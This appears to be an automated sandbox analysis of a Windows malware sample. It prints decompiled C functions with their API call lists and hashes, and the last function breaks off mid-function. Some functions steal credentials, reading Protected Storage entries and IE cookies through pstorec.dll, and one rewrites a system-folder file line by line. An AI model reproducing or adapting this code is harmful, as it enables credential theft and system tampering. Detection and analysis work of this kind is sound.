    0x004090ad
    0x004090b6
    0x004090c5
    0x004090c5
    0x004090cd
    0x0040904a
    0x0040904a
    0x0040904f
    0x00409054
    0x00000000
    0x00000000
    0x00409054
    0x00409048
    0x004090d6
    0x004090dd
    0x004090dd
    0x004090ed
    0x004090f5
    0x004090f9
    0x00409102
    0x00409108
    0x00409112

    APIs
    • CreateMutexW.KERNEL32(Function_00013468,00000000,?), ref: 00408FA3
    • SetEvent.KERNEL32(?), ref: 00408FAF
    • DisconnectNamedPipe.KERNEL32(?), ref: 00408FB7
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00408FC1
    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00408FD6
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00408FFD
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00409020
    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00409061
    • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040908F
    • WriteFile.KERNEL32(?,00A00000,00000004,?,00000000), ref: 004090AD
    • WriteFile.KERNEL32(?,?,00A00000,?,00000000), ref: 004090C5
    • FlushFileBuffers.KERNEL32(?), ref: 004090CD
    • DisconnectNamedPipe.KERNEL32(?,?), ref: 004090DD
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 004090E7
    • CloseHandle.KERNEL32(?), ref: 004090F9
    • SetEvent.KERNEL32(?), ref: 00409102
    • RtlExitUserThread.NTDLL(00000000), ref: 00409109
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$NamedPipeReadWrite$DisconnectEventObjectSingleWait$BuffersCloseConnectCreateExitFlushHandleMutexThreadUser
    • String ID:
    • API String ID: 1315446275-0
    • Opcode ID: 556070a87038c07dcb6e6fa3e7de1799797b4f076c4313f04c1055f305819c70
    • Instruction ID: 0cb2e5f646281ea7631582c9499c13ef43426c1b221fdafdf767c364a77c5c70
    • Opcode Fuzzy Hash: 556070a87038c07dcb6e6fa3e7de1799797b4f076c4313f04c1055f305819c70
    • Instruction Fuzzy Hash: F9510675800108FFDB219FA5EE489EFBBB9EF44341B10842AF642E2164E7769E50DB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408841, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 118networksynchronizationthreadCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00408841() {
				char _v12;
				HANDLE* _v48;
				long _v52;
				void _v64;
				intOrPtr _v92;
				void* __esi;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t40;
				intOrPtr _t43;
				void* _t48;
				void* _t53;
				signed int _t54;
				void* _t56;
				HANDLE* _t59;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;

				E0040CFFE( &_v12,  &_v12, 0, 8);
				L00403961();
				E00410678();
				E004077B4();
				 *0x412dd0(0x412950, _t53, _t56, _t48);
				E0040FC06();
				E0040CFFE(SetThreadPriority(GetCurrentThread(), 2), 0x412970, 0, 0x10);
				 *0x412974 = CreateEventW(0, 1, 0, 0);
				E00410635();
				_t28 = InternetOpenA( *0x413488, 0, 0, 0, 0);
				 *0x412978 = _t28;
				_v64 = 0xea60;
				InternetSetOptionA(_t28, 2,  &_v64, 4);
				E00409725(0);
				E00406A74(0x4121c0,  &_v64, 0,  *0x412c18);
				_t33 =  *0x412a64; // 0x246f5a8
				_v92 = E00409115( &_v64, 0, E004086E1,  *((intOrPtr*)(_t33 + 0x28)));
				 *0x412706 = 0;
				 *0x412970 = 0;
				L1:
				L1:
				if(WaitForSingleObject( *0x412974, 0x14) == 0) {
					 *0x412970 = 1;
				}
				_t67 =  *0x412970; // 0x0
				if(_t67 != 0) {
					goto L9;
				}
				_t43 =  *0x412a64; // 0x246f5a8
				if(E00409241( *((intOrPtr*)(_t43 + 0x30))) != 0) {
					goto L1;
				} else {
					_t69 =  *0x412970; // 0x0
					if(_t69 == 0) {
						E00408723( &_v52);
						WaitForSingleObject( *0x412974, 0xffffffff);
						while(1) {
							_t70 =  *0x412970; // 0x0
							if(_t70 <= 0) {
								goto L9;
							}
							Sleep(0x14);
						}
					}
				}
				L9:
				_t59 = _v48;
				WaitForMultipleObjects(_v52, _t59, 1, 0xffffffff);
				_t54 = 0;
				if(_v52 > 0) {
					do {
						CloseHandle(_t59[_t54]);
						_t54 = _t54 + 1;
					} while (_t54 < _v52);
				}
				E0040CF40(_t59);
				CloseHandle( *0x412974);
				InternetCloseHandle( *0x412978);
				_t40 =  *0x412a64; // 0x246f5a8
				return E004091EC(_v64,  *((intOrPtr*)(_t40 + 0x28)));
			}





















    0x00408857
    0x0040885c
    0x00408861
    0x00408866
    0x00408870
    0x00408876
    0x00408892
    0x004088a4
    0x004088a9
    0x004088b8
    0x004088c8
    0x004088cd
    0x004088d5
    0x004088dd
    0x004088ed
    0x004088f2
    0x00408904
    0x00408908
    0x0040890e
    0x00000000
    0x00408914
    0x00408924
    0x00408926
    0x00408926
    0x0040892c
    0x00408932
    0x00000000
    0x00000000
    0x00408934
    0x00408943
    0x00000000
    0x00408945
    0x00408945
    0x0040894b
    0x00408952
    0x0040895f
    0x0040896f
    0x0040896f
    0x00408975
    0x00000000
    0x00000000
    0x00408969
    0x00408969
    0x0040896f
    0x0040894b
    0x00408977
    0x0040897a
    0x00408983
    0x00408989
    0x0040898f
    0x00408991
    0x00408994
    0x0040899a
    0x0040899b
    0x00408991
    0x004089a2
    0x004089ad
    0x004089b9
    0x004089bf
    0x004089d6

    APIs
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(?,0246F5A8,?), ref: 0041069F
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(00413260,00413260,?), ref: 004106AE
    • RtlInitializeCriticalSection.NTDLL(00412950), ref: 00408870
    • GetCurrentThread.KERNEL32 ref: 0040887D
    • SetThreadPriority.KERNEL32(00000000), ref: 00408884
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00412970,00000000,00000010), ref: 0040889E
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 004088B8
    • InternetSetOptionA.WININET ref: 004088D5
      • Part of subcall function 00409725: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 00409858
      • Part of subcall function 00409115: RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 00409138
    • WaitForSingleObject.KERNEL32(00000014,004086E1,?), ref: 0040891C
    • WaitForSingleObject.KERNEL32(000000FF,?), ref: 0040895F
    • Sleep.KERNEL32(00000014), ref: 00408969
    • WaitForMultipleObjects.KERNEL32(0000EA60,0000EA60,00000001,000000FF), ref: 00408983
    • CloseHandle.KERNEL32(0000EA60), ref: 00408994
    • CloseHandle.KERNEL32(0000EA60), ref: 004089AD
    • InternetCloseHandle.WININET ref: 004089B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandleInternetWait$CombineObjectPathSingleThread$AllocateBuffCharCreateCriticalCurrentEventHeapInitializeLowerMultipleObjectsOpenOptionPrioritySectionSleep
    • String ID: `
    • API String ID: 2138626244-1850852036
    • Opcode ID: 915aaa268c7ec8444cbfee55a4d2ca3b0cc020c750ec5310755a41839f443b50
    • Instruction ID: f440cd505804de12f7b188d0e44ca0d33965df2cbf40e48425697d43f4bd20c9
    • Opcode Fuzzy Hash: 915aaa268c7ec8444cbfee55a4d2ca3b0cc020c750ec5310755a41839f443b50
    • Instruction Fuzzy Hash: CF41A0B1214201AFD710BF65EE49AAA3B69FB44344F00853EB241E21B1DFB44860DB6E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040614A, Relevance: 22.8, APIs: 15, Instructions: 272fileCOMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E0040614A(void* _a4) {
				void* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _v28;
				char* _v32;
				intOrPtr* _v36;
				void* _v40;
				short _v560;
				void* __edi;
				void* __esi;
				intOrPtr _t71;
				void* _t75;
				long _t76;
				intOrPtr _t83;
				char* _t85;
				signed int _t103;
				long _t104;
				signed int _t111;
				intOrPtr _t112;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t136;
				void* _t137;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				signed int _t151;
				void* _t152;
				intOrPtr* _t153;

				 *0x412a6c(0,  &_v560, 0x25, 1);
				_t71 =  *0x412a64; // 0x246f5a8
				PathCombineW( &_v560,  &_v560,  *(_t71 + 0x14c));
				_t75 = CreateFileW( &_v560, 0xc0000000, 1, 0, 4, 0, 0);
				_t149 = _t75;
				_v8 = _t149;
				if(_t149 == 0xffffffff) {
					return _t75;
				}
				_t76 = GetFileSize(_t149, 0);
				_v12 = _t76;
				if(_t76 == 0) {
					L59:
					return CloseHandle(_v8);
				}
				_t144 = E0040CF2D(_t76);
				_v40 = _t144;
				if(_t144 == 0) {
					L58:
					goto L59;
				}
				if(ReadFile(_t149, _t144, _v12,  &_v12, 0) == 0) {
					L57:
					E0040CF40(_v40);
					goto L58;
				}
				_t83 = E00408F05(_v12, _t144,  &_v12);
				_v24 = _t83;
				if(_t83 == 0) {
					goto L57;
				} else {
					_v28 = _a4;
					while(1) {
						_t85 = E0040D611(_v28, 1);
						_v32 = _t85;
						if(_t85 == 0) {
							break;
						} else {
							if( *_t85 == 0x21) {
								_v32 = _t85 + 1;
							}
						}
						_t111 = 0;
						_v20 = 0;
						if(_v12 <= 0) {
							L41:
							_t112 = E0040D611(_v28, 2);
							_v28 = _t112;
							if(_t112 != 0) {
								continue;
							}
							break;
						} else {
							goto L10;
						}
						do {
							L10:
							_t113 = _v24 + _t111 * 4;
							_v36 = _t113;
							_t114 =  *_t113;
							if(_t114 != 0) {
								_t153 = _t114;
								while(1) {
									_t116 =  *_t153;
									if(_t116 != 0x20 && _t116 != 9) {
										break;
									}
									_t153 = _t153 + 1;
								}
								_t117 =  *_t153;
								if(_t117 != 0x23 && _t117 != 0xd && _t117 != 0xa && _t117 != 0) {
									while(_t117 != 9) {
										if(_t117 == 0x20 || _t117 == 9) {
											break;
										} else {
											if(_t117 == 0) {
												goto L40;
											}
											_t153 = _t153 + 1;
											_t117 =  *_t153;
											continue;
										}
									}
									if( *_t153 == 0) {
										goto L40;
									} else {
										goto L26;
									}
									while(1) {
										L26:
										_t118 =  *_t153;
										if(_t118 != 9 && _t118 != 0x20) {
											break;
										}
										_t153 = _t153 + 1;
									}
									_t119 =  *_t153;
									if(_t119 != 0x23 && _t119 != 0xd && _t119 != 0xa && _t119 != 0) {
										_t148 = E0040D3C6(_v32);
										if(E0040D3EC(_t120, _t153, _t148, _v32) == 0) {
											_t122 =  *((intOrPtr*)(_t148 + _t153));
											if(_t122 == 0x20 || _t122 == 0xd || _t122 == 0xa || _t122 == 0x23 || _t122 == 0) {
												E0040CF40( *_v36);
												 *_v36 = 0;
											}
										}
									}
								}
							}
							L40:
							_t111 = _v20 + 1;
							_v20 = _t111;
						} while (_t111 < _v12);
						goto L41;
					}
					_v20 = _v20 | 0xffffffff;
					SetFilePointer(_v8, 0, 0, 0);
					SetEndOfFile(_v8);
					_t151 = 0;
					if(_v12 <= 0) {
						L46:
						_t146 = _a4;
						_t152 = "\r\n";
						do {
							_t128 = E0040D611(_t146, 1);
							if(_t128 == 0) {
								break;
							}
							if( *_t128 != 0x21) {
								if(_t146 == _a4) {
									_t103 = _v20;
									if(_t103 != 0xffffffff) {
										_t136 =  *((intOrPtr*)(_v24 + _t103 * 4));
										_t104 = E0040D3C6(_t136);
										_v16 = _t104;
										if(_t104 != 0 &&  *((char*)(_t136 + _t104 - 1)) != 0xa) {
											WriteFile(_v8, _t152, 2,  &_v16, 0);
										}
									}
								}
								WriteFile(_v8, _t146, E0040D3C6(_t146),  &_v16, 0);
								WriteFile(_v8, " ", 1,  &_v16, 0);
								WriteFile(_v8, _t128, E0040D3C6(_t128),  &_v16, 0);
								WriteFile(_v8, _t152, 2,  &_v16, 0);
							}
							_t146 = E0040D611(_t146, 2);
						} while (_t146 != 0);
						FlushFileBuffers(_v8);
						E0040CF5C(_v12, _v24);
						goto L57;
					} else {
						goto L43;
					}
					do {
						L43:
						_t137 =  *(_v24 + _t151 * 4);
						if(_t137 != 0) {
							_v20 = _t151;
							WriteFile(_v8, _t137, E0040D3C6(_t137),  &_v16, 0);
						}
						_t151 = _t151 + 1;
					} while (_t151 < _v12);
					goto L46;
				}
			}









































    0x00406163
    0x00406169
    0x0040617c
    0x00406195
    0x0040619b
    0x0040619d
    0x004061a3
    0x0040643c
    0x0040643c
    0x004061ab
    0x004061b1
    0x004061b6
    0x00406430
    0x00000000
    0x00406433
    0x004061c2
    0x004061c4
    0x004061c9
    0x0040642f
    0x00000000
    0x0040642f
    0x004061e1
    0x00406427
    0x0040642a
    0x00000000
    0x0040642a
    0x004061ef
    0x004061f4
    0x004061f9
    0x00000000
    0x004061ff
    0x00406202
    0x00406205
    0x0040620a
    0x0040620f
    0x00406214
    0x00000000
    0x0040621a
    0x0040621d
    0x00406220
    0x00406220
    0x0040621d
    0x00406223
    0x00406225
    0x0040622b
    0x004062ef
    0x004062f4
    0x004062f9
    0x004062fe
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406231
    0x00406231
    0x00406234
    0x00406237
    0x0040623a
    0x0040623e
    0x00406244
    0x00406246
    0x00406246
    0x0040624a
    0x00000000
    0x00000000
    0x00406250
    0x00406250
    0x00406253
    0x00406257
    0x0040627a
    0x0040626d
    0x00000000
    0x00406273
    0x00406275
    0x00000000
    0x00000000
    0x00406277
    0x00406278
    0x00000000
    0x00406278
    0x0040626d
    0x00406280
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406282
    0x00406282
    0x00406282
    0x00406286
    0x00000000
    0x00000000
    0x0040628c
    0x0040628c
    0x0040628f
    0x00406293
    0x004062a9
    0x004062b7
    0x004062b9
    0x004062be
    0x004062d5
    0x004062dd
    0x004062dd
    0x004062be
    0x004062b7
    0x00406293
    0x00406257
    0x004062df
    0x004062e2
    0x004062e3
    0x004062e6
    0x00000000
    0x00406231
    0x00406304
    0x0040630e
    0x00406317
    0x0040631d
    0x00406322
    0x0040634c
    0x0040634c
    0x0040634f
    0x00406354
    0x0040635d
    0x00406361
    0x00000000
    0x00000000
    0x0040636a
    0x00406373
    0x00406375
    0x0040637b
    0x00406380
    0x00406383
    0x00406388
    0x0040638d
    0x004063a2
    0x004063a2
    0x0040638d
    0x0040637b
    0x004063ba
    0x004063d0
    0x004063e8
    0x004063fa
    0x004063fa
    0x00406409
    0x0040640b
    0x00406416
    0x00406422
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406324
    0x00406324
    0x00406327
    0x0040632c
    0x00406333
    0x00406340
    0x00406340
    0x00406346
    0x00406347
    0x00000000
    0x00406324

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,00000000,01020500), ref: 00406163
    • PathCombineW.SHLWAPI(?,?,?), ref: 0040617C
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000000,00000000), ref: 00406195
    • GetFileSize.KERNEL32(00000000,00000000), ref: 004061AB
    • CloseHandle.KERNEL32(?), ref: 00406433
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 004061D9
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000001), ref: 0040630E
    • SetEndOfFile.KERNEL32(?), ref: 00406317
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406340
    • WriteFile.KERNEL32(?,00401CBC,00000002,?,00000000,00000001), ref: 004063A2
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,00000001), ref: 004063BA
    • WriteFile.KERNEL32(?,00401CA8,00000001,?,00000000), ref: 004063D0
    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004063E8
    • WriteFile.KERNEL32(?,00401CBC,00000002,?,00000000), ref: 004063FA
    • FlushFileBuffers.KERNEL32(?,00000001), ref: 00406416
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Write$Path$AllocateBuffersCloseCombineCreateFlushFolderHandleHeapPointerReadSizeSpecial
    • String ID:
    • API String ID: 3438174515-0
    • Opcode ID: 40669e7909e70ac8e1f7e4548d19464109f1f6a91a46e0adcff658fb62b280a3
    • Instruction ID: d035cecbc1a6ab26862cb8aebec12fb1d86e8cb55c131b0115b7399582cce9ff
    • Opcode Fuzzy Hash: 40669e7909e70ac8e1f7e4548d19464109f1f6a91a46e0adcff658fb62b280a3
    • Instruction Fuzzy Hash: 7F91B231900119AFDF21AFA4CD85AEE7BBAAB09304F1540BAE542F72D0D7784D628B5D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405E48, Relevance: 22.7, APIs: 15, Instructions: 163sleepfilesynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00405E48(void* __eflags) {
				intOrPtr _v12;
				intOrPtr _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t23;
				WCHAR* _t27;
				void* _t28;
				WCHAR* _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t35;
				long _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				intOrPtr _t47;
				signed int _t49;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t64;
				intOrPtr _t65;
				void* _t68;
				void* _t70;

				E004077B4();
				 *0x412738 = CreateEventW(0, 1, 0, 0);
				E0040966F(0x412740);
				_t23 =  *0x412a64; // 0x246f5a8
				PathCombineW(0x412740, 0x412740,  *(_t23 + 0xc));
				 *0x412948 = CreateFileW(0x412740, 0x80000000, 0, 0, 3, 0, 0);
				E00409B3F();
				_t27 = L00403961();
				 *0x412730 = _t27;
				_t28 = CreateFileW(_t27, 0x80000000, 0, 0, 4, 0, 0);
				 *0x41273c = _t28;
				if(_t28 == 0xffffffff) {
					 *0x41273c = 0;
				}
				_t29 = E00410678();
				 *0x412734 = _t29;
				_t30 = CreateFileW(_t29, 0x80000000, 0, 0, 4, 0, 0);
				 *0x41294c = _t30;
				_t73 = _t30 - 0xffffffff;
				if(_t30 == 0xffffffff) {
					 *0x41294c = 0;
				}
				_t31 =  *0x412a64; // 0x246f5a8
				_v20 = E00409115(_t64, _t73, E00405CC5,  *((intOrPtr*)(_t31 + 0x2c)));
				_t33 =  *0x412a64; // 0x246f5a8
				_t34 = E00409241( *((intOrPtr*)(_t33 + 0x28)));
				_t74 = _t34;
				if(_t34 != 0) {
					_t59 =  *0x412a64; // 0x246f5a8
					E00409266(_t74,  *((intOrPtr*)(_t59 + 0x28)), 3, 0, 0, 0, 0);
					while(1) {
						_t61 =  *0x412a64; // 0x246f5a8
						if(E00409241( *((intOrPtr*)(_t61 + 0x28))) == 0) {
							goto L8;
						}
						Sleep(0x14);
					}
				}
				L8:
				_t70 = E004089E8;
				do {
					_t35 =  *0x412a64; // 0x246f5a8
					if(E00409241( *((intOrPtr*)(_t35 + 0x28))) == 0) {
						_t65 =  *0x412a64; // 0x246f5a8
						_t49 = 0;
						_t68 = E00409968( *((intOrPtr*)(_t65 + ((_t49 & 0xffffff00 | ( *0x412af8 & 0x00000001) != 0x00000000) + 5) * 4)));
						while(E00406DC4(0, _t65, _t70 -  *0x412bac, _t68) == 0) {
							Sleep(0x14);
						}
						while(1) {
							_t57 =  *0x412a64; // 0x246f5a8
							if(E00409241( *((intOrPtr*)(_t57 + 0x28))) != 0) {
								goto L16;
							}
							Sleep(0x14);
						}
					}
					L16:
					E00409B88(0x412740);
					Sleep(0x64);
					_t38 = WaitForSingleObject( *0x412738, 0x32);
					_t80 = _t38;
				} while (_t38 != 0);
				_t39 =  *0x412a64; // 0x246f5a8
				E00409266(_t80,  *((intOrPtr*)(_t39 + 0x28)), 3, 0, 0, 0, 0);
				while(1) {
					_t41 =  *0x412a64; // 0x246f5a8
					if(E00409241( *((intOrPtr*)(_t41 + 0x28))) == 0) {
						break;
					}
					Sleep(0x14);
				}
				CloseHandle( *0x412738);
				CloseHandle( *0x41273c);
				CloseHandle( *0x41294c);
				CloseHandle( *0x412948);
				_t47 =  *0x412a64; // 0x246f5a8
				return E004091EC(_v12,  *((intOrPtr*)(_t47 + 0x2c)));
			}




























    0x00405e4d
    0x00405e5f
    0x00405e6b
    0x00405e70
    0x00405e7a
    0x00405e93
    0x00405e98
    0x00405e9d
    0x00405eaa
    0x00405eaf
    0x00405eb5
    0x00405ebd
    0x00405ebf
    0x00405ebf
    0x00405ec5
    0x00405ed2
    0x00405ed7
    0x00405edd
    0x00405ee2
    0x00405ee5
    0x00405ee7
    0x00405ee7
    0x00405eed
    0x00405eff
    0x00405f03
    0x00405f0b
    0x00405f10
    0x00405f12
    0x00405f14
    0x00405f22
    0x00405f31
    0x00405f31
    0x00405f40
    0x00000000
    0x00000000
    0x00405f2b
    0x00405f2b
    0x00405f31
    0x00405f42
    0x00405f42
    0x00405f47
    0x00405f47
    0x00405f56
    0x00405f5f
    0x00405f67
    0x00405f76
    0x00405f82
    0x00405f7c
    0x00405f7c
    0x00405fa1
    0x00405fa1
    0x00405fb0
    0x00000000
    0x00000000
    0x00405f9b
    0x00405f9b
    0x00405fa1
    0x00405fb2
    0x00405fb3
    0x00405fba
    0x00405fc8
    0x00405fce
    0x00405fce
    0x00405fd6
    0x00405fe4
    0x00405ff3
    0x00405ff3
    0x00406002
    0x00000000
    0x00000000
    0x00405fed
    0x00405fed
    0x0040600a
    0x00406016
    0x00406022
    0x0040602e
    0x00406034
    0x0040604a

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00405E59
      • Part of subcall function 0040966F: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    • PathCombineW.SHLWAPI(00412740,00412740,?), ref: 00405E7A
    • CreateFileW.KERNEL32(00412740,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00405E8D
      • Part of subcall function 00409B3F: PathCombineW.SHLWAPI(?,?,0246F5A8), ref: 00409B62
      • Part of subcall function 00409B3F: CreateDirectoryW.KERNEL32(?,00000000), ref: 00409B71
      • Part of subcall function 00409B3F: SetFileAttributesW.KERNEL32(?,00000006), ref: 00409B80
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00405EAF
    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00405ED7
    • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000,?,Function_00005CC5,?), ref: 00405F2B
    • Sleep.KERNEL32(00000014,-0000A1C4,00000000,0246F5A8,?,?,Function_00005CC5,?), ref: 00405F7C
    • Sleep.KERNEL32(00000014,?,-0000A1C4,00000000), ref: 00405F9B
    • Sleep.KERNEL32(00000064,00412740,?,?,Function_00005CC5,?), ref: 00405FBA
    • WaitForSingleObject.KERNEL32(00000032), ref: 00405FC8
    • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000), ref: 00405FED
      • Part of subcall function 004091EC: SetEvent.KERNEL32(?,00000000,004089D0,?), ref: 004091F6
      • Part of subcall function 004091EC: WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040920F
      • Part of subcall function 004091EC: CloseHandle.KERNEL32(00000004), ref: 00409217
      • Part of subcall function 004091EC: CloseHandle.KERNEL32(?), ref: 00409220
      • Part of subcall function 004091EC: CloseHandle.KERNEL32(?), ref: 00409229
    • CloseHandle.KERNEL32(?), ref: 0040600A
    • CloseHandle.KERNEL32 ref: 00406016
    • CloseHandle.KERNEL32 ref: 00406022
    • CloseHandle.KERNEL32 ref: 0040602E
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateSleep$File$Path$CombineEventObjectSingleWait$AttributesDirectoryFolderSpecial
    • String ID:
    • API String ID: 4283066563-0
    • Opcode ID: f5ca64725814b063a02d9c72717fb00863c755f34a91c1ebf9cf4e67b5540d5c
    • Instruction ID: 1875d51d99516e7fb3559e5a0e5841b5cf9340728af077902e8f6ddd414f643d
    • Opcode Fuzzy Hash: f5ca64725814b063a02d9c72717fb00863c755f34a91c1ebf9cf4e67b5540d5c
    • Instruction Fuzzy Hash: 53514171100241BFC6206B66EF49E9B3F79EB85754B00817AB611E72F2DBB94960DB28
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404803, Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 326libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E00404803() {
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v72;
				int _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				int _v92;
				char _v100;
				void* _v104;
				char _v108;
				intOrPtr* _v116;
				intOrPtr* _v128;
				intOrPtr* _v132;
				char _v136;
				intOrPtr* _v144;
				char _v148;
				char _v164;
				intOrPtr* _v168;
				intOrPtr* _v172;
				char _v180;
				intOrPtr* _v188;
				char _v196;
				int _v204;
				char _v208;
				WCHAR* _v212;
				intOrPtr _v216;
				char _v224;
				short _v232;
				int _v236;
				intOrPtr _v240;
				short _v244;
				short* _v252;
				short _v256;
				char* _v260;
				short _v264;
				intOrPtr _v272;
				void* __edi;
				_Unknown_base(*)()* _t123;
				intOrPtr _t126;
				intOrPtr _t133;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				intOrPtr* _t146;
				short _t147;
				intOrPtr* _t148;
				short _t149;
				intOrPtr* _t150;
				short _t151;
				intOrPtr* _t152;
				short _t153;
				WCHAR* _t155;
				short _t156;
				short _t157;
				char* _t161;
				int _t162;
				short _t165;
				char* _t167;
				signed char _t178;
				signed int _t179;
				short* _t181;
				intOrPtr* _t183;
				intOrPtr* _t185;
				intOrPtr* _t187;
				short _t200;
				char _t203;
				short _t221;
				short _t227;
				void* _t228;
				void* _t229;
				short* _t230;
				short _t233;
				short _t235;

				_t123 = GetProcAddress(LoadLibraryA("pstorec.dll"), "PStoreCreateInstance");
				_t233 = 0;
				_v84 = 0;
				_v36 = 0x10;
				_v32 = 2;
				_v28 = 0;
				_v24 = 0;
				_v92 = 0;
				_v76 = 0;
				if(_t123 == 0) {
					L46:
					_v68 = 0;
					_v72 = 0;
					if(E004046AA(_t192,  &_v72, 1,  &_v68) != 0) {
						_t226 = _v72;
						if(_v72 > 0) {
							_t133 = E0040CEF9(_t226 + _t233 + 0x32, _v92);
							if(_t133 != 0) {
								_v92 = _t133;
								E0040CF7C(E0040CF7C(_t133 + _t233, "\nIE Cookies:\n", 0xd) + 0xd, _v80, _t226);
							}
							E0040CF40(_v68);
						}
					}
					_t126 = _v92;
					_t249 = _v92;
					if(_v92 == 0) {
						_t126 = "Empty";
					}
					E00410EC7(_t192, _t208, _t249, 1, 0, 0, L"Protected Storage:\n\n%S", _t126);
					E0040CF40(_v92);
					E004046AA(_t192, 0, 0, 0);
					E00404BC8(1);
					return 1;
				}
				_push(0);
				_push(0);
				_push(0);
				_t192 =  &_v84;
				_push( &_v84);
				if( *_t123() != 0) {
					goto L46;
				}
				_t140 = _v100;
				if(_t140 == 0) {
					goto L46;
				}
				_t208 =  &_v72;
				_push( &_v72);
				_push(0);
				_push(0);
				_push(_t140);
				if( *((intOrPtr*)( *_t140 + 0x38))() != 0) {
					L45:
					_t142 = _v116;
					_t192 =  *_t142;
					 *((intOrPtr*)( *_t142 + 8))(_t142);
					goto L46;
				} else {
					while(1) {
						_t144 = _v88;
						_push(0);
						_t208 =  &_v84;
						_push( &_v84);
						_push(1);
						_push(_t144);
						if( *((intOrPtr*)( *_t144 + 0xc))() != 0) {
							break;
						}
						__eflags = _v100 - 0xe161255a;
						if(_v100 != 0xe161255a) {
							continue;
						}
						_t146 = _v132;
						_t147 =  *((intOrPtr*)( *_t146 + 0x3c))(_t146, 0,  &_v100, 0,  &_v108);
						__eflags = _t147;
						if(_t147 != 0) {
							continue;
						}
						while(1) {
							_t148 = _v128;
							_t149 =  *((intOrPtr*)( *_t148 + 0xc))(_t148, 1,  &_v88, 0);
							__eflags = _t149;
							if(_t149 != 0) {
								break;
							}
							_t150 = _v168;
							_t151 =  *((intOrPtr*)( *_t150 + 0x54))(_t150, 0,  &_v136,  &_v104, 0,  &_v148);
							__eflags = _t151;
							if(_t151 != 0) {
								continue;
							}
							_v188 = 0;
							_v204 = 0;
							while(1) {
								_t152 = _v172;
								_t153 =  *((intOrPtr*)( *_t152 + 0xc))(_t152, 1,  &_v196, 0);
								__eflags = _t153;
								if(_t153 != 0) {
									break;
								}
								_t227 = StrStrW(_v212, L":StringData");
								__eflags = _t227;
								if(_t227 == 0) {
									continue;
								}
								__eflags =  *(_t227 + 0x16);
								if( *(_t227 + 0x16) != 0) {
									continue;
								}
								__eflags = _t227 - _v216;
								if(_t227 == _v216) {
									continue;
								}
								_t155 = _v212;
								_t156 =  *((intOrPtr*)( *_t155 + 0x44))(_t155, 0,  &_v180,  &_v148, _v216,  &_v208,  &_v224,  &_v164, 0x10);
